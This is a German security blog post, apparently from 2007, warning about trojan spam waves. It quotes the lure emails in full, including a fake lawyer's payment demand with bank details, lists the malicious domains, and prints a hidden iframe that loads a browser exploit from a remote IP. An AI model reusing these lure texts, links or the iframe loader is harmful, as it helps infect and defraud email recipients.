Kaum habe ich den Beitrag über günstige Flüge eingegeben, sind schon wieder neue Mails im Postfach. Diesmal haben wir ein Nokia-Handy gekauft und sollen uns die Quittung auf einer koreanischen Seite abholen.

Dort ist natürlich nichts ausser ein Serverfehler 500 zu sehen. Auch hier ist ein Iframe mit JavaScript-Exploit eingebunden, der Schwachstellen im Browser angreift und einen Trojaner auf dem PC herunterlädt. Die IP der Servers wo der Exploit abgelegt ist, ist dieselbe, wie bei der vorherigen Mail.

Nicht auf den Link klicken!

Hallo! Vielen Dank fuer den Kauf von NOKIA 8800. Die Quittung sollten Sie per Mail bekommen haben. Falls bei Ihnen nichts eingetroffen ist, so bitte folgen Sie den nachfolgenden Link und bekommen Sie die Quittung im HTML Format. http:// linksysvoip.co .kr/bbs /admin.htm
Sie koennen uns auch eine Anfrage senden, so dass wir Ihnen diese Quittung nochmals  zukommen lassen.
Vielen Dank fuer Ihr Verstaendnis!

Eine Neuauflage der IFrame-Trojaner-Mails ist heute bei uns im Postfach gelandet. Diesmal ist es kein mordender Asiate in Münschen oder Ufos in der Berliner U-Bahn, sondern günstige Flugreisen durch ganz Europa.

Diesmal wird auf die schon öfters verwendete Domain overturekorea.biz verlinkt, die den Iframe zum Exploit beinhaltet.

Also, wie immer gilt: Nicht auf den Link klicken!

Achtung! In diesem Sommersaison fuehrt die Gesellschaft  “Berliener Airlines” eine neue Aktion durch.
Sie koennen nun in jeden beliebigen Punkt innerhalb der EU fuer nur EUR 20 fliegen. Sie bezahlen nur Ihre Versicherung und den Treibstoff. Beeiligen Sie sich! Die Anzahl der Tickets ist stark beschraenkt.
Naeheres dazu unter http:// overturekorea .biz/

Heute sind neue Trojaner-Mails im Umlauf, die kurz und knapp eine Antwort-Mail imitieren. Im Anhang befindet sich eine Zip-Datei, die aber Kaspersky Antivirus erkannt und den Inhalt gelöscht hat. Enthalten ist der Trojaner “Trojan-Downloader.Win32.Nurech.bk”.

Hiermit erhalten Sie die angeforderten Unterlagen
mfG

Es sind mal wieder neue gefälschte Rechnungen im Umlauf, diesmal sogar von einem Antivirus-Hersteller, von Avira, die die bekannte AntiVir-Software kostenlos anbieten.

Im Anhang befindet sich eine Zip-Datei, die den Trojaner “IBill” enthält, den allerdings Kaspersky noch nicht erkannt und gelöscht hat. Avira hat zu den Trojaner-Mails bereits Informationen auf ihre Seite gesetzt. Von Avira wird der Anhang auch noch nicht erkannt, aber beide Anbieter und auch alle anderen Antivirus-Hersteller werden sicher in Kürze entsprechende Update für ihre Software anbieten.

Wenn Sie wirklich die Software kaufen möchten: Avira AntiVir PersonalEdition Premium.

Passend zu dem Amoklauf in Blacksburg, wo der 23jährige Asiate Cho Seung Hui aus Südkorea 32 Menschen ermordet hat, kommen jetzt ähnlich klingende eMails, die von einem Asiaten in Münschen berichten, der 6 Morde begangen haben soll.

Die verlinkte Adresse zeigt wie bei den letztens Mails einen Serverfehler, beinhaltet aber ein Iframe. In der verknüpften Seite ist wieder schädlicher JavaScript-Code mit Exploits enthalten.

Wie immer gilt: Nicht die URL aufrufen. Die URL variiert von Mail zu Mail.

Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http:// geocities .com/ Provo Wolfie 7757

Seien Sie bitte vorsichtig! Danke fuer ihre Aufmerksamkeit

Es sind mal wieder Trojaner-Mails im Umlauf, die behaupten von eBay zu sein. Im Anhang befindet sich der Trojaner “Trojan-Downloader.Win32.Nurech.bg”, den Kaspersky allerdings bereits aus der Mail entfernt hat. Ansonsten gilt hier wie immer, den Anhang nicht öffnen.

Die Trojaner-Versender lassen sich immer neue Sachen einfallen, um den eMail-Leser zum öffnen von Zip-Dateien oder wie heute wieder zum anklicken eines Links zu bewegen. Auf der verlinkten Seite stehen keine weiteren Informationen sondern nur “500 Internal Server error.” Also scheinbar ein Serverproblem. Aber, so wie bei früheren Mails, ist in der Seite ein iframe enthalten, in dem eine Adresse eingebunden ist, die einen schädlichen JavaScript-Code mit Exploits enthält. Der Ordnername hinter geocities.com kann auch ein anderer sein, hier haben die Versender nicht die Mühe gescheut, mehrere Ordner bzw. Accounts anzulegen.

Also auf keinen Fall Links in eMails unbekannter Herkunft anklicken.

Die Berliner U-Bahn Mitarbeiter fanden die Reste eines unbekannten Flugkoerpers.
Interessant findet man auch die Ermittlung von moeglichen Gruenden des Unwohlseins einiger U-Bahn Angestellten. Nach etlichen Inspektionen wurde ein Fremdkoerper gefunden. Wie Wissenschaftler behaupten, koennte der Koerper so gross wie ein Bus sein. Es wurde auch vermutet, er haette seltsame Strahlen aussenden koennen und das wegen rund um dem Rumpf gebildeter “Totzone”.
Naeheres dazu unter http:// geocities. com/ Mai sieSyn ge9716

Weitere Informationen erhalten Sie auch bei PC Welt.

Seit heute kursieren neue Trojaner-Mails im Internet, die den Absender eines Anwalts tragen, der tatsächlich für die in der Mail genannte Firma fragwürdige Rechnungen eintreibt. Hier sind nun wir der angebliche Schuldner, der eine Summe von 106 Euro zu zahlen hat. Zahlungsziel war übrigens gestern und geschrieben wurde die Rechnung oder Mahnung in der Zukunft am 31.04.2007. Wo der April natürlich auch 31 Tage hat.
Noch konnte Kasperky den Inhalt der Zip-Datei nicht identifizieren, aber das dürfte sich in den nächsten Stunden ändern.

Anwaltskanzlei Tank
RA Olaf Tank
Rheiner Landstraße 197 49078 Osnabrück

Aktenzeichen: 409044/26
Osnabrück, den 31.04.2007

Bitte geben Sie Ihr Aktenzeichen bei jeglichem Schriftverkehr und Zahlungen immer an.

Sehr geehrte Kunde,

hiermit zeige ich die Interessenvertretung der Firma Andreas & Manuel Schmidtlein GbR, Vor der Hube 3, D 64572 Büttelborn an. Ordnungsgemäße Bevollmächtigung wird anwaltlich versichert. Meine Mandantschaft macht gegen Sie folgende Forderung geltend:

Rechnung vom 15,08,2006 aus Dienstleistungsvertrag mit der Rechnungsnummer R283843 für die Anmeldung vom 29,07,2006 um 14:33 Uhr auf der Internetseite P2P-heute.com mit folgender Anmelde-IP: 217.752.056.36.

Sie schulden meiner Mandantschaft daher 349,00 EUR. Da Sie sich in Verzug befinden, sind Sie gegenüber meiner Mandantschaft verpflichtet, die durch meine Tätigkeit entstandenen Gebühren zu erstatten.

Das Originalrechnung finden Sie im Anhang als signierte PDF Datei.
Bitte behalten Sie das Original Rechnung unbedingt für Ihre Unterlagen.

Liquidation:

1,3 Geschäftsgebühr, Nr. 2300 VV 544,50 EUR

Auslagenpauschale, Nr. 7002 VV 9,50 EUR

Gesamtsumme 791,00 EUR
Der von Ihnen zu zahlende Gesamtbetrag beläuft sich somit auf 106,00 EUR.

Ich fordere Sie auf, den Gesamtbetrag, innerhalb einer Frist von 10 Tagen, also bis zum

09.04.2007 (hier eingehend)

auszugleichen. Bitte überweisen Sie diesen Betrag auf das unten angegebene Konto. Sollte der Gesamtbetrag nicht fristgerecht eingehen, werde ich meiner Mandantschaft empfehlen, die Forderung ohne weitere außergerichtliche Ankündigung, gerichtlich geltend zu machen, wodurch weitere Kosten zu Ihren Lasten entstehen.

Wir möchten in diesem Zusammenhang auf die bereits ergangenen Urteile verweisen, welche Sie auf der Internetseite www. forderungseinzug .de einsehen können.

Bei der Anmeldung auf oben genannter Internetseite wurde die zu diesem Zeitpunkt übermittelte IP-Adresse gespeichert. Die IP-Adresse ermöglicht den Strafverfolgungsbehörden, im Falle einer strafrechtlichen Ermittlung, die Identifikation des PC’s, der zum Zeitpunkt der Anmeldung genutzt wurde.

Als weitere Sicherheitsinstanz ist auf oben genannter Internetseite das Geburtsdatum des Users eingegeben worden. Sollte sich bei einer weiteren überprüfung der Daten herausstellen, dass ein falsches Geburtsdatum eingegeben wurde, ist von einem Betrugsdelikt auszugehen. In diesem Fall hätte sich eine gegebenenfalls minderjährige Person eine Leistung erschlichen, die ihr nicht hätte bereitgestellt werden dürfen. Hier behalte ich mir im Namen meiner Mandantschaft die Erstattung einer Strafanzeige vor. Die dabei anfallenden Kosten und Auslagen sind gegebenenfalls gegen Sie geltend zu machen.

Mit freundlichen Grüßen

Olaf Tank
Rechtsanwalt

Anwaltskanzlei Tank
RA Olaf Tank
Postfach 6251
49078 Osnabrück
Tel: 0541-34 97 70-0
Fax: 0541-34 97 70-77
anwalt@ forderungseinzug .de

Bankverbindung Ausland: Postbank Hannover IBAN DE06 2501 0030 0077 6673 07, BIC: PBNKDEFF

Bankverbindung Deutschland: Postbank Hannover Kontonummer: 77 667 307, BLZ 250 100 30
Bitte geben Sie als Zahlungsempfänger unbedingt RA Olaf Tank an und Ihr Aktenzeichen als Verwendungszweck.

Nachtrag: Die jüngsten eingegangenen eMails erkennt nun Kaspersky und entfernt den Trojaner “Trojan-Downloader.Win32.Nurech.bf” aus der angehängten Zip-Datei.

Die angeblichen Reisebuchungsbestätigungen von last-minute.com kommen nun in etwas abgewandelter Form. In der Mail ist nun auch die URL aus den in den letzten Tagen versandten Wetterdienst-Mails enthalten.

Weiterhin gilt. Auf keinen Fall die Links in den Mails anklicken.

Sehr geehrter Kunde,

wir freuen uns, dass Sie bei www .last-minute .com gebucht haben – vielen Dank fur Ihren Auftrag!
Unten finden Sie Ihre verbindliche Buchungsbestatigung mit allen wichtigen Informationen zu den von Ihnen gebuchten Leistungen. Bitte drucken Sie diese Bestatigung aus und bewahren Sie sie auf. Die Buchungsbestatigung erhalten Sie auch noch einmal per E-Mail an die von Ihnen angegebene E-Mail-Adresse.

Sollten Sie Fragen zu Ihrer Buchung haben, dann schreiben Sie uns eine E-Mail http:// overturekorea .biz/ oder wenden sich telefonisch an unsere Reise-Experten.
Unter 01815-333 527 (0,14 EUR/Min.) oder aus dem Ausland unter +49-75-4446531 helfen wir Ihnen gerne weiter. Sie erreichen uns werktags von 8.00 bis 20.00 Uhr, am Wochenende sowie an Feiertagen von 10.00 bis 18.00 Uhr.
Buchungsbestaetigung zum asudrucken erhalten Sie unter: http:// overturekorea .biz/

www. last-minute .com wunscht Ihnen eine schone Reise – wir freuen uns, wenn Sie uns weiterempfehlen!

Deutscher SPAM wirbt für koreanische Seite. Dahinter verbirgt sich allerdings wieder der Versuch durch Aufruf der Seite schädlichen Code auf den heimischen PC einzuschleusen. Im Quelltext ist nämlich folgender Code zu finden:

< iframe style = 'visibility: hidden;' width = '1' height = '1' src = 'http://58.65.239.106/ cosmos /mrm_x/'>

Die im IFrame aufgerufene Seite beinnhaltet einen JavaScript-Code mit Exploits, wie schon in den vergangenen Mails wie z.B. von Lastminute.com oder TMS Logistik. Also auf keinen Fall den Link in der eMail anklicken. Auch ein bei Firefox funktionierender Exploit könnte darin enthalten sein. Der Internet Explorer ist aber auf alle Fälle anfällig.

Sehr geehrte Damen und Herren,
wie der Wetterdienst zum 7.04.2007 berichtet, werden in Deutschland in der naechsten Zeit Ueberschwemmungen erwartet. Besonders gefaehrliche Situation bildet sich fuer die am Ufer der Elbe gelegenen Orten.
Der westliche Teil Deutschland sollte aber auch auf der Hut sein, denn eventuelle Hochwasser-Situationen koennen auch dort entstehen. Infolge all dessen bitten wir Sie entsprechende Massnahmen zu ergreifen. Naeheres dazu sowie auch notwendige Sicherheitsmassnahmen kann man hier  http:// overturekorea .biz/ abrufen

Vielen Dank fuer Ihre Aufmerksamkeit